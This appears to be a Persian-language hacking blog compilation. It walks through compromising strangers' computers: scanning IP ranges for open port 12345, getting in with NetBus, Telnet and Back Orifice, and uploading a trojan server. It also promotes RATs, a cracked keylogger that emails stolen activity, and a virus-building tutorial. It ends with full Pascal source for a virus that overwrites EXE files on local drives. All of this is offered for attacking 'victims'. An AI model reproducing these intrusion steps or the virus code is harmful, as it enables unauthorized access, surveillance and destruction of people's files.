ما به اين برنامه ها احتياج داريم که همش تو خود ويندوز هست: BACK ORFICE. Wingate.Netbus.Telnet
اول وارد Wingate شده و در جايي که نوشته شده HOST NAME آي پي قرباني رو قرار مي ديم و در قسمت بعدي به Scan port رفته و Defualt برنامه که Port 23 هست رو به 12345 تغيير ميدهيم و گزينه سوم که try to open port only هست را انتخاب و اسکن رو بزنيد. البته در اينجا ميتونيد از يه RANGE IP هم استفاده كنيد وهم مي تونيد اي پي قرباني رو بدهيد و در صورت باز بودن پورت ميتونيد مراحل بعدي رو اجرا كنيد. حالا ما فرض رو بر اين ميذاريم كه يه Range Ip داديم. بعد از اسکن شما با قسمتي به نام Server Found مواجه مي شويد که يکسري آي پي را با پورتهاي باز مورد نظر شما پيدا کرده که در ادامه بايد يکي از آي پي هارو به دلخواه انتخاب کنيد.
در قسمت بعدي NETBUS را باز كرده و در جاي Hostname/IP اي پي مورد نظر را وارد كنيد و در ادامه ي كار اگر از شما پسسورد بخواهد بايد از Telnet استفاده كنيد و اگر نخواهد كه كار تقريبا تمومه . حالا فرض ميكنيم كه پسسورد خواست بايد مراحل زير را طي كنيد:

به قسمت RUN رفته و CMD را اجرا كرده و بعد Telnet را اجرا كنيد و اي پي را نوشته و بعد از پرت 12345 استفاده كنيد در پنجره Netbus براي كرك پسوورد اين نوشته را وارد كنيد: Password;1;123serverPWD;Y4hoo

شما ميتونيد پسورد ديگه اي هم بذاريد حالا با Netbus دوباره وصل شده و پسورد را Y4hoo ميزنيد

همه چيز در دست شماست

حالا به قسمت File Manager رفته و سرور را به سيستم طرف ارسال كنيد و در قسمتي كه از شما پرسيد سرور را به كجا بفرستم شما ادرس C:Windows را ميدهيد .و قسمت دانلود را ميبنديم . حالا كارمون با Netbus تموم شد .

حالا به BACK ORFICE ميريم و در قسمت Target Host اي پي طرفو ميزنيم و پرت 12345 و باز در قسمت بعدي پسورد را زده و SEND را ميزنيم

trojan چييه؟

torjan به سري برنامه هايي مي گن كه امكاناته فوقالاده زياد رو به كاربر براي وصل شدن به يك كامپوتر در net ميده بيشتر اين برنامه ها به يك شكل كار مي كنند اينكه با يك server وip  كامپوتر طرف كار مي كنند. به نظر من اينا خيلي از فرمان هاي MS-DOS بهتر هستن چون با امكاناتي كه دارن حتي مي شه عكس desktop ترف رو هم عوض كرد و حتي كارهايي كه خود ترف هم نمي تونه با كامپوترش انجام بده ولي در مقابل وصل شدن با اين برنامه ها يكم مشكله. ك نفر كه با trojan  به يك كامپوتر وصل مي شه يك كركر هم باشه چون راحت مي شه با trojan پسورد و اين جور چيزا رو پيدا كرد چون اين برنامه ها registry كامپوتر ترف هم در اختيار شما مي زارن. يكي از اين برنامه ها كه رو CD پيدا مي شه SUB7 هست كه به نظر من مفت نمي ارزه و اينم مطمنم كه با ICQ هم اصلا كار نمي كنه بيشتر اين نفراتي كه من ديدم از e-mail براي پيدا كردن  ip استفاده مي كنند كه قديمي شده چند تا روش جديد هست كه هم سري تره و هم راحت تره مثلا ICQ CGI كه آخرشه مخصوصا ICQ كه راحت مي تونين download كنين و يك شماره ازش درست كنين و ديگه همه جوره مي شه ازش استفاده كرد .این هم عکس از يك torjan خيلي قوي كه پيدا كردم اسمش هم هست optix pro .

.((براي Download ICQ  اين جا كليك كنيد))

منبع : http://victory2.netfirms.com/

 آموزش ساخت ویروس flicker

در ادامه مطلب

Download

مرجع   :     http://www.o00o.ir/Cat/15.aspx

بزرگترین برنامه جاسوسی دنیا به دست 4ull_hacker کرک شد. این برنامه جاسوسی که از نوع کی لاگر است می تواند تمام کارهای انجام شده در سیستم را ثبت کند و به ایمیل شما ارسال کند در پایین به برخی از ویژگی های این برنامه اشاره می کنیم.

دانلود برنامه با حجم 304 کیلوبایت

Troya
« یکی از قویترین نرم افزارهای در هک کلاینت »
این نرم افزار قادر است کلیه فعالیتهای یک کامپیوتر را از طریق اینترنت به دست بگیرد و نرم افزاری فوق العاده در هک کلایت (کامپیوترهای افراد) است.
فقط کافی است سروری با این نرم افزار بسازید و آن را در کامپیوتر قربانی اجرا کنید تا تمام کنترل را از وی گرفته و هر کاری که می خواهید با سیستم او انجام دهید .

تغییراتی در این ورژن:
 در ادامه مطلب

همانطور که می دانید تروجانها و یا همان نرم افزار های Remote Administration Tool ( کنترل از راه دور ) امروزه به عنوان یکی از خطرناک ترین ویروسها می باشند که امکانات کنترلی فراوانی را به کارفرمای خود می دهند . در عین حال اگر بخواهیم استفاده مناسب از این نرم افزار ها نماییم بسیار مفید خواهند بود . تقریبا تمامی نرم افزار های RAT از یک سرور و کلاینت تشکیل می شوند که با اجرای فایل سرور در سیستم قربانی , شما قادر به دسترسی به آن می باشید .

دوست خوبم محمد عزیز تروجان RAT ای  نوشته که کاملا منحصر به فرد است . این نرم افزار برخلاف نرم افزارهای مشابه دارای کلاینت نمی باشد ! و کارفرما برای اتصال به آن از مرورگر خود استفاده می کند و سیستم قربانی به صورت یک وبسایت در اینترنت در می آید .

توضیحات کامل به زبان نویسنده ی نرم افزار  در ادامه مطلب

این ویروس هنگلم اجرا شدن برنامه ها یک اخطار به کاربر می ده و نمی گذارد که برنامه اجرا بشه

Program ARA1; Uses Dos; Label 1,2; const a='Hello,My name is A.R.A.1'; Var S: PathStr; path:string; Attr:word; I: integer; f:string[12]; d,d1:SearchRec; bb:string; afile,bfile:file of Char; ch:char; Function searchdir (dir:string):string; var dirinfo:searchrec; i:integer; begin findfirst (dir+'*',directory,dirinfo); randomize; for i:=1 to random(30) do begin findnext(dirinfo); if doserror<>0 then break; end; if pos('.',dirinfo.name)=0 then searchdir:=dir+dirinfo.name+'\' else searchdir:=dir; end; begin 2: randomize; i:=random(4); case i of 0:path:='C:\'; 1:path:='D:\'; 2:path:='E:\'; 3:path:='F:\'; end; path:=searchdir(path); while doserror=0 do begin randomize; i:=random(2); if i=1 then path:=searchdir(path) else break; end; f:=COPY((EnvStr(Envcount)),9,12); for i := 1 to Length(f) do f[i] := UpCase(f[i]); if Pos('.EXE',f)=0 then f:=f+'.EXE'; findfirst(f,Archive,d1); if doserror<>0 then halt; FindFirst(path+'*.EXE',Archive,d); while DosError = 0 do begin if d.Name=f then goto 1; assign(bfile,path+d.Name); Getfattr(bfile,attr); if attr and ReadOnly <> 0 then goto 1; reset(bfile); bb:=''; for i:=1 to 800 do begin read(bfile,ch); if i>600 then bb:=bb+ch; end; if Pos(a,bb)=0 then begin close(bfile); break; end; Close(bfile); 1: FindNext(d); end; S := FSearch(path+d.name,path); if S = '' then goto 2; delete(path,length(path),1); Assign(afile,f); Getfattr(bfile,attr); if attr and ReadOnly <> 0 then halt; reset(afile); reset(bfile); for i:=1 to 4800 do begin read(afile,ch); write(bfile,ch); end; close(afile); close(bfile); end.